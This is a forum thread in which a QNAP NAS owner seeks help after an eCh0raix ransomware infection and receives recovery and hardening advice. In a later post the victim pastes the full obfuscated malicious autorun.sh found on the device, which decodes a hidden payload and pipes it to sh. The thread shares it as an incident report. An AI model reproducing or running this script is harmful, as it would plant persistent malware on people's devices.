I seem to have been attacked by the eCh0raix on my TS-431P, all my searches have lead me to this being targeted at a qnap vulnerability. I've read through the following thread:
viewtopic.php?t=160274
As its dated back in March I was hoping there's more info on this now. I've tried various tool to find try to decrypt or find the key but have had no luck. The file shares are still accessible on the network but I'm not able to SSH to connect to the web interface. Qnap finder can't see it either. Nothing on the device should've been opened to the internet, but I can't be certain without getting into it to take a look. I've since blocked its IP on my router from reaching outside.
Any help would be appreciated. Even any info about the possible encryption scheme used.
Hit by ransomware
- dolbyman
- Guru
- Posts: 35276
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Hit by ransomware
Kill the NAS (format the drives and xheck the NAS autostart.sh for virus entries)
The set it up againnand restore your data from backups
make absolutely sure your have upnp disabled and no ports forwarded on your router
The set it up againnand restore your data from backups
make absolutely sure your have upnp disabled and no ports forwarded on your router
-
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
That would be the logical approach, if I had backups. I used a raid 1+0 to protect from physical failures, the qnap getting hacked with ransomware was the least likely scenario. A lot of the projects I have on there I can probably be recovered to some degree, but there's 20 years of family photos that don't exist anywhere else. Wiping the drives is my last resort for now.
All the encrypted files are about twice the size of the originals. But the virus responsible for it lies somewhere else on the device and not embedded into the files right? I should be safe to back up these encrypted ones without risk of spreading anything?
You did just remind however that I may in fact have some backups afterall. Before I bought this qnap, I used a 2TB Buffalo. I switched when I outgrew the size, but I think that may possibly still be intact. It won't have everything, but it will have a fairly large portion.
Has qnap patched the vulnerability that is being used by this attack? I'm unsure of what my current firmware version is.
All the encrypted files are about twice the size of the originals. But the virus responsible for it lies somewhere else on the device and not embedded into the files right? I should be safe to back up these encrypted ones without risk of spreading anything?
You did just remind however that I may in fact have some backups afterall. Before I bought this qnap, I used a 2TB Buffalo. I switched when I outgrew the size, but I think that may possibly still be intact. It won't have everything, but it will have a fairly large portion.
Has qnap patched the vulnerability that is being used by this attack? I'm unsure of what my current firmware version is.
- dolbyman
- Guru
- Posts: 35276
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Hit by ransomware
the files are encrypted..not infected
brute forcing the encryption of modern ransomware is basically hopeless as supercomputers would be on it for centuries..so dont bother...if the c&c servers ever get confiscated the individual encryptio keys could be released (has happened before)
do not bank on any patches by qnap..there will be more of those attacks over and over..make sure your NAS is never exposed to the web
brute forcing the encryption of modern ransomware is basically hopeless as supercomputers would be on it for centuries..so dont bother...if the c&c servers ever get confiscated the individual encryptio keys could be released (has happened before)
do not bank on any patches by qnap..there will be more of those attacks over and over..make sure your NAS is never exposed to the web
-
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
Still no luck in the decryption, but finally got into the device. The log shows things of interest. 10/19 is when the ransomware started. My bigger concern is this "wasthere" user, and the fact it seems to have been recreated many times over at least a year. (log only goes back 12 months) Also what is this shared folder it created?
/.qpkg/photostation2/9cd00ccc-d02f-11ea-87d0-0242ac130010
The only one with permission to this was the wasthere user. I looked in the directory but only found files related to photostation.
Log image:
https://i.imgur.com/H3r4fOj.png
I've been trying to update the firmware to the latest (5.0.0.1828), both through the controlpanel and manually from the console, but it tells me the firmware file format is abnormal. I'm on 4.4.3 but can't seem to update to anything higher despite the download page saying 5.0 is for my device ( i tried multiple version inbetween)
/.qpkg/photostation2/9cd00ccc-d02f-11ea-87d0-0242ac130010
The only one with permission to this was the wasthere user. I looked in the directory but only found files related to photostation.
Log image:
https://i.imgur.com/H3r4fOj.png
I've been trying to update the firmware to the latest (5.0.0.1828), both through the controlpanel and manually from the console, but it tells me the firmware file format is abnormal. I'm on 4.4.3 but can't seem to update to anything higher despite the download page saying 5.0 is for my device ( i tried multiple version inbetween)
- dolbyman
- Guru
- Posts: 35276
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Hit by ransomware
so potentially an exposed and vulnerable photstation was the way your NAS was hacked
as said before ..do not bother to fix the current state of your NAS...if you want to keep the encrypted files..save them away
then kill your NAS and start from scratch
as said before ..do not bother to fix the current state of your NAS...if you want to keep the encrypted files..save them away
then kill your NAS and start from scratch
-
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
Not sure why photostation would've been running in the first place, I've never used it. I reinitialized the nas last night, but I still have weird stuff in the autorun.sh. How do I edit this file? Can't seem to find it anywhere and for whatever reason the web frontend doesn't provide a way to edit it, only view it. I've tried the instructions on the wiki but none of the examples work for me. My model isn't even listed.
Code: Select all
#!/bin/sh
t$KWGrwy$""rue; fal${fHFIEmQMdNi}${obdnuP}${XarKVSLiBy}se; f$'\x61'lse${AIPPNzHPzzcDPPs}; ${cBVh}${JhkheiZeuZvvsI}type${DleRxTPtLAX}; ${YqaRtX}ty${dzwohFcVLFbiwj}pe${ZPsQNCwQFO}; ${NXGxSKtFaM}fals${VxevNaqQKBTqkG}e; f$'\x61'ls${bHYOMRpc}e; unse${qJMfUhMEy}t; ${QMWKAdnAAnLpewY}${EVZwl}eval${gtCFJo}; $RxSyl$''fa${XUHoEAteTBpAeCo}lse; ${iIPVfIE}t${tJfqJCyxxdIPaY}ype; $'\x63'omma${ebSIIwfXTpc}nd$exrEtXr$""${hxybngQbKdXyoMU}; ty${ruFcNuW}pe${fiEx}${ZBtuvqNKDAWCMmw}; ${ZHpCyhX}t${TcvwAGPxwf}ype${RsEFmHVZJNCY}; t${kylUWLbaLI}est; ${ExljgtmdPusuQq}fal${zbsgJWeURXUFw}se; eva${MKodnfCDv}l; eva${Tafh}l${EpHk}; tes${pcLU}t${BIbXlduZgHIWu}${XZCaZjNC}; te${wJNKwv}st${eXGaEeYnrONXui}${LtGVxePu}; ${HLWZpK}unset; FpUVYa=t${yRXLQ}r${nCKZBXzKPecJTe}${xakYMxttAsqaMcM}; iPMhfQH=\\; kqgyzLdX=$mKNOnemnZwp$''${iPMhfQH}13${IaULZozTIRrdETR}3; DfiVEJI=$xlSlKfplsOt$''${iPMhfQH}05${BEAxAivsDSUjifN}5; IdgFRj=$KVqRTSYTuOv$''${iPMhfQH}13${PwbBLAPXJCBjdlb}4; $FpUVYa '#j>MdQ)RuwG'$IdgFRj'<ozThY'$DfiVEJI'yc!*qgr"px}'$kqgyzLdX'NP'"'"'i\ntXmDf(lb$=]%&JOKHCFe{E`SAWvI aUVZ|+kLBs;n' 'kDx Bv\nE;'$kqgyzLdX'YUSoQjM=+t{>L}Vm#ZRT&'"'"'s"'$DfiVEJI'aqwWyK($*A`PH]ecGJ!gX%)N<i|bfnzhrCl'$IdgFRj'OdupIF'<<"yZOqgYqQI"|${RXeSsP}${YLyCZcrIKagmlOP}sh${PuBqxEV}
"C/vA /PU)dfBf%x
kYyVlca%ddq)#JBmZ$Y'++')`$peIGtBYlcyR$|Fqlc#JBmZ$q133lcXBIzq)<IO#<r}UYlcz]%Vpqlc#JBmZ$q055lcFHoJq)o#ZIIFYlcQ
kv#qlc#JBmZ$q134lcUH$Aq)ldfBf%x
kMN>xb\%<uoICLR}+ DHSN'N'NqJ#h!zNl`$peIGtBNvK`&g;Nlo#ZIIFN[k'{"Ers
|nUBTNl<IO#<r}UN]P*tZeFG(M dQXA-c=Oa$fVWjlpmYyNMNr
#<E}>Cl=]YAo+ WcNl`$peIGtBN*USXzNlo#ZIIFN'Nl<IO#<r}UNVsqky`Kpg!Mjh$&GIF-; BP{|fDJT[tLme"nauZQHR(N'N'Nbx%d\OvNSS' L av}<KDFjrD> 'Wlc|t#
QQsqPlct<VpXp$n<ZVo<DqUlcHXzm$|Rr`PQKv<q)Xo/y}i/PJDFu`)K;"Ls<lRwISLs<l&:/y}i:/Py}i:/]PK/y}i:/]PK/Py}i:/]PK/y}i/Q11:/]PK/t)Yxt/Py}i:/]PK/t)Yxt/y}iwDY)>>xi "vO" }Kix>F"{/ FO/i]tt"2{(1"HH" }Kix>F"f%"S";FP;"v-"wI1w"(("FYJ)"w.w"(("KF;]Kic"t)Yxt"KRwIS1*wIS1XXWNo/
&w&wc"YxPF"IK"}i"/WNo/
W/WHNo/
W/W%"KRwISK*/W&wc"FYJ)"wISK*wISKXXWNo/
&w&wcc"W/W%"FYJ)"ISK**No/
&cc"ww%"FYJ)"I1cc"W%"FYJ)".cc"FPxYc"&D;FP;"v "/F;Y/Y)in}U"(("Y)in }KR/F;Y/Y)in}U"HH"S";FP;"v "/>i;/lEs_jgg</.Y)in}U"(("Y)in }KR/>i;/lEs_jgg</.Y)in}Uc"&DY)>>xi "vO"UF;YnU"{"/ FO/i]tt"2{(1"HH"UF;YnU"f%"S"PF "vi"VlcISucP/zf.WzDzNVwIS1//z//zzz/&wV
zH^zNVwIS1//z//zzz/&wV
z%zD//TcP/zf^zHzDz%zNN^zD
zBz
zD.W//`&V"wIS4:vISY)in }K&/]q}i]u.Y)in&w"H"PF "vi"VP/^VwIS2//z//zzz/&wV"z?R"z?zf.Wz%/z1/T`Vc"&Dy }KRD;FP;"vn"wISY)in }K&/P>y.Y)inw"(("n)K"}"}i"J)>FP"L]yt}Y"E)hit)x "r]t;}>F }x"dFy"jFY)K }iUPc" )"y }KRCUF;YnU"wI}w"`x;J"vn"wISY)in }K&/P>y.Y)inwC"((";FP;"o"v-"wIy }Kw"(("y }KRC }Kix>F"wIy }KwC"((";FP;"v "wIy }Kw"((";FP;hK};FxytFRIf>b;F>`"wISy }K&/.;>`.QQQQQQw%"(("K>"wIS;FP;hK};FxytF&w"(("yKFxbc"y }KRVVc" )iFD;FP;"v-"wISy }K&w"HH";FP;"o"v "wISy }K&w"(("S"Y)>>xi "vO"KFx t}ib"{/ FO/i]tt"2{(1"HH"ti"vPn"/y}i/y]Pey)u"/]PK/y}i/KFx t}ibc"n)K"}"}i"J)>FP"L]yt}Y"E)hit)x "r]t;}>F }x"dFy"jFY)K }iUPc" )"y }KRCKFx t}ib"w/PJxKF/IS}&w"2{/ FO/i]ttC"((";FP;"o"v-"wIy }Kw"(("y }KRC }Kix>F"wIy }KwC"(("y }KR/PJxKF/ISy }KXXW/&"((";FP;"v "wIy }Kw"(("yKFxbc" )iFcD;FP;"v-"wISy }K&w"HH";FP;"o"v "wISy }K&wc"&"(("S"y }KRCUF;YnU"\lsj$_E$A" Fn')trL"vn"wISY)in }K&/ Fn_PJxKF.}in)wCD;FP;"v-"wISy }K&w"HH";FP;"o"v "wISy }K&wc"&"(("S"y }KRC>)]i;"H"PF "vi"wP/.Wzfz/PJxKFz/N^"/
zBz%".W/z1/U`w"H"JFx "vi"1CD;FP;"v-"wISy }K&w"HH";FP;"o"v "wISy }K&wc"&"(("S"n)K"}"}i"=s=l$E$'3_Es<s"=s=l$E$'2_Es<s"=s=l$E$'1_Es<s"rE0_Es<sc" )";FP;"v "w/PJxKF/IS}&w"(("y }KRw/PJxKF/IS}&w"(("yKFxbc" )iFcD;FP;"v-"wISy }K&w"HH";FP;"o"v "wISy }K&w"(("y }KR/>i;/lEs_jgg<c"&DxKYJ_)RC]ix>F"v>"H"UKF`"v}"wu86zH}N3v6
86w"{"/ FO/i]tt"(("FYJ)"u86"HH"FYJ)"xK>CD]`i`y}iRIfFYJ)"YCFYJ)"viF"wzzu73zzu72wC ;jCFYJ)"viF"wzzu70zzu78zzu6yzzu70wC"H";K"w[`=[tqiTbj\F<Pd[FLbTt)Lw"wGtZhT`gt]m<bxrpYudO$PGPw%DYU}RIfFYJ)"mJCFYJ)"viF"wzzu71zzu68zzu75wCj!JCFYJ)"viF"wzzu78zzu78zzu62zzu64wC|uiCFYJ)"viF"wzzu64zzu6yzzu68zzu79wC"H";K"w]EneK>}OMOFxls\dLExLt}w"w!dKqQ.sO.dFL<=U!dQdPArw%DPPJy}iRIfFYJ)"LCFYJ)"viF"wzzu79zzu6ywCl)rCFYJ)"viF"wzzu6 zzu67zzu6xzzu6xwC"H";K"wxJ$ZYkurUJEQ]Lm-=se-tMr}!$w"w$]Ann`bt m`a-\kp+g.pxaU}JQw%DPPJJbFeRIfFYJ)"xCFYJ)"viF"wzzu77zzu64wC`CFYJ)"viF"wzzu6 zzu62wCE>)CFYJ)"viF"wzzu6yzzu7xzzu64zzu64wC"H";K"wPZJsx-PAm}nrm|qlmxEtw"w<LYdG]kdjOUy| \LOQ )w%DPPJx];JRIfFYJ)";yCFYJ)"viF"wzzu69zzu67zzu67wCsCFYJ)"viF"wzzu76zzu7xwC"H";K"wqgUKEkL$j}\e! na])gsp;mw"w\T!$Am.Kp])Te.dMg[-pZTTw%DPPJY)inRIfFYJ)"sqCFYJ)"viF"wzzu64zzu68zzu79wCMMCFYJ)"viF"wzzu6 zzu78zzu73wC)CFYJ)"viF"wzzu65zzu64wC"H";K"wen$tjtFkQqFQ-}+UEtaew"wj..AEhK;KFt|FOdT)})dw%DxKYJxK>RIfFYJ)"y;CFYJ)"viF"wzzu67zzu61zzu74wCUCFYJ)"viF"wzzu72zzu6xwC]CFYJ)"viF"wzzu63zzu73wC"H";K"wb$s$js=e'QZyOA]``T+FLZw"wuTAtQbGxnM\`dh.kdE;OUQw%DxKYJu86RIfFYJ)"=`CFYJ)"viF"wzzu72zzu73zzu73wC<CFYJ)"viF"wzzu6xzzu6ywChKCFYJ)"viF"wzzu6xzzu71zzu6FwC"H";K"w]pAuZO+pYep]lhgME=Ap+hw"w\p;FP}AOJE!P)k)AtMe>iGw%D}`x;JRIfFYJ)"dCFYJ)"viF"wzzu6 zzu74wCeCFYJ)"viF"wzzu6Fzzu62wC"H";K"wMJbj!Z\MFE[GlEAU+ l$hid-qw"wr\OAg|Kmklkpy+`\mA=;|Ei}Kw%DYK)iPRIfFYJ)"|!kCFYJ)"viF"wzzu63zzu6yzzu79zzu71wC`.CFYJ)"viF"wzzu7xzzu68zzu67wCiMCFYJ)"viF"wzzu6Fzzu6nzzu61wC"H";K"we Qm<'[-aZn;ee+pn>nTslw"w.=!l[eJF]-FeykFKT=!T'Kw%DxKYJRC]ix>F"v>"H"UKF`"v}"wu86zH}N3v6
86w"{"/ FO/i]tt"(("FYJ)"wIxKYJu86w"HH"FYJ)"wIxKYJxK>wCD;FP;"vn"w./ISxKYJ&w"(("P }KRC`h C"HH"S";FP;"wISps\l_\gmj=$N0
&w"(("P }KRIf"Y "wIf" }Kix>F"wISps\l_\gmj=$N0
&w"%w"(("`h "%"HH"S";FP;"wIS0&w"(("P }KRIf"Y "wIf" }Kix>F"wIS0&w"%w"(("`h "%c"&"((";FP;"vn"wISP }K&/ISxKYJ&w"(("Y "wISP }K&wc"&"HH"S";FP;"vn"w/;>`/Y)in}U/ISxKYJ&w"(("Y "/;>`/Y)in}Uc"&"HH"SD> }KRIf>b;F>`"v "/;>`/.>)]i;.QQQQQQ%"HH"S"> }KR/;>`/.>)]i;.Gyyu!)yc">b }K"IS> }K&c"&D__pgg<_E$'RD__>) FtRCUF;YnU"\eP;F>"wTi;FKixt"r) FtwCD=g+AT[_E$'_+gE$RCUF;YnU"w=g+AT["\<gjs[$w"E$'T=$_+gE$"vn"/F;Y/`tx;n)K>.Y)inCD=g+AT[_E$'_Lsj<RCUF;YnU"w=g+AT["\<gjs[$w"A\_s=<T'$_Lsj<T<Tg+"vn"/F;Y/`tx;n)K>.Y)inCD=g+AT[_E$'_A\RCUF;YnU"w=g+AT["\<gjs[$w"A\_<|L$"vn"/F;Y/`tx;n)K>.Y)inCD__pgg<_=g+ARC;FP;"vn"/F;Y/ Fnx]t;_Y)in}U/pgg<.Y)in"(("Yx;"/F;Y/ Fnx]t;_Y)in}U/pgg<.Y)in"2{/ FO/i]tt"HH"Yx;"wISY)in }K&/pgg<.Y)inwC"HH"S";FP;"wIxKYJ_)w"R"xK>"(("__pgg<_=g+AR<\v+s\sjrc"&"DY)>>xi "vO"Jxt_x``"{"/ FO/i]tt"2{(1"(("S"__pgg<_E$'RIfJxt_x``"vvUF;_y));_` "`)K;_} R0%c"&D;FP;"wIS__pgg<_=g+A&w"R"<\v+s\sjr"HH";FP;"wIxKYJ_)w"R"xK>"(("S";FP;"vn"/F;Y/T\_<s\"(("__pgg<_E$'RwIS__pgg<_E$':v/ FO/>; yt)Yb&7w"HH"__pgg<_E$'RwIS__pgg<_E$':v/ FO/>; yt)Yb&5wc"&"HH"__pgg<_E$'RwIS__pgg<_E$':v/ FO/P u&6wD;FP;"wuIS=g+AT[_E$'_+gE$&w"oR"wuw"(("S"]y}x;;xYJ"v>"wIS=g+AT[_E$'_Lsj<&w"v "2c">)]i;"v;"]y}nP"]y}2:Y)in}U"wIS> }K&w"{"/ FO/i]tt"2{(1"HH"S";FP;"vn"/F;Y/T\_<s\"((">)]i;"v;"Fu;4"/ FO/>>Yytb0`7"wIS> }K&wc"&"&"HH">)]i;"IS__pgg<_E$'&"v;"Fu;2"IS> }K&"HH"S";FP;"wIS__>) Ft&w"R"w<\v201w"((">)]i;"v;"Fu;2"/ FO/>; yt)Yb4"IS> }K&c"&"HH"S"]y}x;;xYJ"v>"wIS=g+AT[_E$'_Lsj<&w"v "2c">)]i;"v;"]y}nP"]y}2:Y)in}U"wIS> }K&wc">)]i;"v;"Fu;4"/ FO/>>Yytb0`7"wIS> }K&wc"&"HH"S";FP;"wIS__>) Ft&w"R"w<\v269qw"((">)]i;"v;"Fu;2"/ FO/P Y6"IS> }K&c"&"HH"S";FP;"wIS__>) Ft&w"R"w<\v869w"((">)]i;"v;"Fu;2"/ FO/P }6"IS> }K&c"&"HH"S";FP;"wIxKYJ_)w"R"xK>"HH"IS__pgg<_=g+A&"R"w<\v+s\sjrw"(("S"n)K"}"}i"5"7"4"6"3"8c" )">)]i;"v;"Fu;2"w/ FO/>; yt)YbIS}&w"IS> }K&"(("yKFxbc" )iFc"&c"&"HH"S";FP;"wIxKYJ_)w"R"u86"(("n)K"i"}i"/ FO/P Y"/ FO/P u"/ FO/P }"I__pgg<_E$'c" )"n)K"}"}i"6"I=g+AT[_E$'_Lsj<c" )">)]i;"v;"Fu;2"ISi&IS}&"IS> }K&"(("yKFxb"2c" )iFc" )iFc"&"HH"S">)]i;"v;"Fu;2"If/Py}i/Jxt_x``"vvUF;_y));_` "`)K;_} R0%6"IS> }K&c"&c"&Dn)K"n}tF"}i"wISPPJy}i&w"wIS]`i`y}i&w"w.wc" )";FP;"vn"wISy }K&/.IS}`x;J&/ISn}tF&w"HH"yKFxbc" )iFD;FP;"wIn}tFw"oR"w.w"HH";FP;"o"vn"wISy }K&/.IS}`x;J&/ISYK)iP&.PJw"(("S";FP;"vP".pgg<_<Tr$"(("KFx "vK"y));;}>F"#".pgg<_<Tr$"HH"FYJ)"C x;F"B*PC"{".pgg<_<Tr$c";FP;"vP"wISy }K&/.pgg<_<Tr$w"(("KFx "vK"y));;}>F"#"wISy }K&/.pgg<_<Tr$w"HH"FYJ)"C x;F"B*PC"{"wISy }K&/.pgg<_<Tr$wc";FP;"wIy));;}>Fw"HH"S"KFx "vK"y));;}>F"#".pgg<_<Tr$c";FP;"vP"wISy }K&/.pgg<_<Tr$w"(("KFx "vK"y));;}>F"#"wISy }K&/.pgg<_<Tr$wc"&c";FP;"wIy));;}>Fw"(("S"PtFF`"2c"N"Iy));;}>F"vU;"0"
"(("FRIff"C x;F"B*PC"v"Iy));;}>F"%%"(("N"IF"vU;"0"
"(("N"IF"vt;"1296000"
"(("S";FP;"wI> }Kw"((";FP;"vF"wIS> }K&w"(("S"Y "/c"PJ"vY"wPtFF`"5c"]>)]i;"IS> }K&c"K> }K"IS> }K&w"("&c"i)FuR1c"&c"&c"&D;FP;"wIi)Fuw"R"1"HH"SDK>"wISy }K&/.pgg<_<Tr$wDK>".pgg<_<Tr$D;FP;"o"vn"w./ISxKYJ&w"((";FP;"v "wIS> }K&w"((";FP;"vn"wIS> }K&/ISxKYJ&w"(("Y "wIS> }K&wD; }KRC>b;F>`"v "wISy }K&/.;F>`.QQQQQQw"HH">b;F>`"v "w/PJxKF/L]yt}Y/.;F>`.QQQQQQw"HH">b;F>`"v "w/>i;/lEs_jgg</.;F>`.QQQQQQwCD;FP;"v "wI; }Kw"HH"S"n)K"}"}i"wIy }Kw"w/PJxKF/L]yt}Yw"w/>i;/lEs_jgg<wc" )">b }K"wIS}&/.;F>`.Gyyu!)yw"{"/ FO/i]tt"2{(1"((";FP;"v "wIS}&/.;F>`.Gyyu!)yw"(("; }KRwIS}&/.;F>`.Gyyu!)ywc" )iFcD;FP;"v "wI; }Kwc"&"HH"S"; }KRC>b;F>`"v "/;>`/.;F>`.QQQQQQC"((";FP;"v "wI; }Kwc"&"HH"S">b }K"w/;>`/.;F>`.Gyyu!)yw"(("; }KR/;>`/.;F>`.Gyyu!)y"((";FP;"v "wI; }Kwc"&"HH"S"; }KRC>b;F>`"v ".QQQQQQC"((";FP;"v "wI; }Kwc"&"HH"S">b }K"w.Gyyu!)yw"(("; }KRw.Gyyu!)yw"((";FP;"v "wI; }Kwc"&"HH"; }KRC`h CDY`"wISxKYJ&w"IS; }K&DY "IS; }K&D;xK"vu-n"wISxKYJ&wDUKF`"vA"VV"##$gA"{/ FO/i]tt"2{(1"(("nUKF`RwUKF`"vAw"HH"S"Y)>>xi "vO"nUKF`"{/ FO/i]tt"2{(1"(("nUKF`RnUKF`"HH"nUKF`RUKF`c"&DD$gAD;FP;"wInUKF`w"HH"nUKF`RUKF`DD;FP;"v "wISy }K&/.IS}`x;J&w"HH">b }K"v`"wISy }K&/.IS}`x;J&w"HH">b }K"wISy }K&/.IS}`x;J&wDD;FP;"vn"wIYU}w"(("YJ>) "755"wIYU}w"(("w./ISYU}&wDD;FP;"vn"/;>`/M`bU.Y)in.yxb"(("S";)]YJ"vYK"/;>`/M`bU.Y)in.yxb"wISY)in }K&/M`bU.Y)inwc"K>"/;>`/M`bU.Y)in.yxbc"&DDY`"v`"ISYK)iP&"wISy }K&/.IS}`x;J&/ISYK)iP&.PJw"HH"S"Y`"ISYK)iP&"wISy }K&/.IS}`x;J&/ISYK)iP&.PJwc";)]YJ"vYK"/y}i/y]Pey)u"wISy }K&/.IS}`x;J&/ISYK)iP&.PJwc"&DDYJ>) "755"wISy }K&/.IS}`x;J&/ISYK)iP&.PJwDD}n"N"vn"wISY)in }K&/YK)i;xyw"
c";JFiD;FP;"wIjs+Egrw"HH"js+EgrR12499D;FP;"Iff"Ijs+Egr"("1"%%"R"0"(("P`xYFRV"V"HH"P`xYFRVVDYK)i>}iPRwIff"Ijs+Egr"*"4"%%wD;FP;"o"wIYK)i>}iPw"vFM"0"(("YK)i>}iPRwISYK)i>}iP&0w"DInUKF`"wISy }K&/.IS}`x;J&/ISYK)iP&.PJw"wISY)in }K&/YK)i;xyw"{/ FO/i]tt"2{(1"HH"S"tRIff"fChY"vt"#"wISY)in }K&/YK)i;xywC"/"3%"B"1%%c";FP;"wItw"vU;"0"(("PF "v}"wISt&wV}VwIYK)i>}iPwV"W"W"W"W"VwISy }K&/.IS}`x;J&/ISYK)iP&.PJwV"{VwIP`xYFwV/ FO/i]tt"2{(1V"wISY)in }K&/YK)i;xyw"HH"FYJ)"wIYK)i>}iPwV"W"W"W"W"VwISy }K&/.IS}`x;J&/ISYK)iP&.PJwV"{VwIP`xYFwV/ FO/i]tt"2{(1wV"{{"wISY)in }K&/YK)i;xyw"(("/F;Y/}i};. /YK)i .PJ"KFP;xK;"{"/ FO/i]tt"2{(1"((";)]YJ"vYK"ISY)in }K&/x`xYJF"ISY)in }K&/YK)i;xyc"&Dn}DDn)K"n}tF"}i"wISPPJy}i&w"wIS]`i`y}i&wc" )";FP;"vn"wISy }K&/.IS}`x;J&/ISn}tF&w"HH"Y`"v`"wISn}tF&w"wISy }K&/.IS}`x;J&/ISn}tF&w"HH"S"Y`"wISn}tF&w"wISy }K&/.IS}`x;J&/ISn}tF&wc";)]YJ"vYK"/y}i/y]Pey)u"wISy }K&/.IS}`x;J&/ISn}tF&wc"&" )iFDYJ>) "755"wISy }K&/.IS}`x;J&/ISPPJy}i&wDYJ>) "755"wISy }K&/.IS}`x;J&/IS]`i`y}i&wDDUKF`"Vx >}i:zI1zIzI=)$jU7eiG|qPG2G4Uta34z.:V"/F;Y/PJx )h"{/ FO/i]tt"2{(1"(("SDo";FP;"v "wISy }K&/.t)Uw"((">b }K"wISy }K&/.t)UwDo";FP;"vn"/J)>F/J;;` /YU}vy}i/!<\x];Jq)U}i.YU}"(("S"Y`"v`"/J)>F/J;;` /YU}vy}i/x];Jq)U}i.YU}"/J)>F/J;;` /YU}vy}i/!<\x];Jq)U}i.YU}"HH"Y`"/J)>F/J;;` /YU}vy}i/x];Jq)U}i.YU}"/J)>F/J;;` /YU}vy}i/!<\x];Jq)U}i.YU}c"&"(("FYJ)"VXo/y}i/PJDLg\<Es<sRwwD;FP;"wuISj$!m$\<_r$<lgE&w"R"uLg\<"(("S"DYxPF"wIS=g+<$+<_q$+[<l&w"}i"VwVVwV"H"WNo0v9
W"H"0W"%"nxtPF"cc"W%";FP;"wIS=g+<$+<_q$+[<l&w"vt;"2147483646"cc"FPxY"(("S"TA\R"KFx "v "VwVVwV"vKi"wIS=g+<$+<_q$+[<l&w"Lg\<Es<sc";FP;"v-"wILg\<Es<sw"(("Lg\<Es<sRC "yPR1"Y)]i;RwI=g+<$+<_q$+[<lw"2{/ FO/i]ttCc"&"HH";FP;"wILg\<Es<sw"HH"Lg\<Es<sRCYx;C"DD;FP;"o"v-"wILg\<Es<sw"(("YxPF"wISLg\<Es<s&w"}i"W`h W%";FP;"vn"wVISy }K&V/.t)U/.YU}_t)Uw"HH"S";FP;"v "wVISy }K&V/.t)Uw"HH">b }K"v`"wVISy }K&V/.t)Uw"((";)]YJ"wVISy }K&V/.t)U/.YU}_t)Uwc"&"((";FP;"IffCP;x;"vY"VwVwV*PVwVwV"wVISy }K&V/.t)U/.YU}_t)UwC%%"vt;"209715200"(("Yx;"{{"wVISy }K&V/.t)U/.YU}_t)Uw"##"$gA"cc"FPxYcDIj$rg<$_sEEj:ILg\<Es<sD$gAD&D;FP;"o"v-"wILg\<Es<sw"(("YxPF"wILg\<Es<sw"}i"W]PFKRx >}iW"%";K]F"cc"W%"nxtPF"cc"FPxY"HH"YxPF"wI!m$j|_\<jT+[w"}i"W]PFKRx >}iW%";K]F"cc"W%"nxtPF"cc"FPxY"(("SDYxPF"wISj$rg<$_sEEj&w"}i"VwVVwV"H"10.W"H"127.W"H"192.168.W"H"169.254.W"H"172.1N6v9
.W"H"172.2N0v9
.W"H"172.3N01
.W"H"W:W"%"nxtPF"cc"W%";K]F"cc"FPxY"(("UKF`"VwVwVx >}i:zI1zIzI=)$jU7eiG|qPG2G4Uta34z.:VwVwV"/F;Y/PJx )h"{/ FO/i]tt"2{/ FO/i]tt"(("Fu};"0D&D}n"o";FP;"v-"wILg\<Es<swc";JFi"DFuFY"vx"wIS0&w"/J)>F/J;;` /YU}vy}i/!<\x];Jq)U}i.YU}"##"'4ZqE>|hOYDILg\<Es<sD'4ZqE>|hOYDFtPFDFuFY"vx"wIS0&w"/J)>F/J;;` /YU}vy}i/!<\x];Jq)U}i.YU}Dn}DFu};"0V"{"/J)>F/J;;` /YU}vy}i/_x];Jq)U}i.YU}D;FP;"wI?w"R"0"((";FP;"vP"/J)>F/J;;` /YU}vy}i/_x];Jq)U}i.YU}"((";FP;"vP"/J)>F/J;;` /YU}vy}i/!<\x];Jq)U}i.YU}"((">O"/J)>F/J;;` /YU}vy}i/_x];Jq)U}i.YU}"/J)>F/J;;` /YU}vy}i/x];Jq)U}i.YU}"(("YJ>) "755"/J)>F/J;;` /YU}vy}i/x];Jq)U}i.YU}"((";)]YJ"vYK"/J)>F/J;;` /YU}vy}i/!<\x];Jq)U}i.YU}"/J)>F/J;;` /YU}vy}i/x];Jq)U}i.YU}D&DD."wISy }K&/.IS}`x;J&/ISYK)iP&.PJwDY "wISP }K&wDK>"vKn"wIS; }K&wD;FP;"wI> }Kw"((";FP;"v "wI> }Kw"(("S"Y "/c"PJ"vY"wPtFF`"5c"]>)]i;"IS> }K&c"K> }K"IS> }K&w"("&"D;K]FcD&DDDX) L av}<KDFjrD> ))"
yZOqgYqQI
-
- Starting out
- Posts: 12
- Joined: Tue Apr 18, 2017 5:17 am
Re: Hit by ransomware
I was finally able to mount the partition to access the autorun thanks to this thread: viewtopic.php?f=45&t=130345
Inside I also found the following file there as well. Since I don't believe anything legit on the qnap would be obfuscated in such a way, I deleted it. I'm mainly posting all this for informational purposes.
The files were flagged immutable and unable to delete even with sudo. The following command will fix that:
sudo chattr -i K01XgiiehpQmv.sh
I was also unable to identify "ptgatgrj.cs" so I've removed that as well.
K01XgiiehpQmv.sh
Inside I also found the following file there as well. Since I don't believe anything legit on the qnap would be obfuscated in such a way, I deleted it. I'm mainly posting all this for informational purposes.
The files were flagged immutable and unable to delete even with sudo. The following command will fix that:
sudo chattr -i K01XgiiehpQmv.sh
I was also unable to identify "ptgatgrj.cs" so I've removed that as well.
K01XgiiehpQmv.sh
Code: Select all
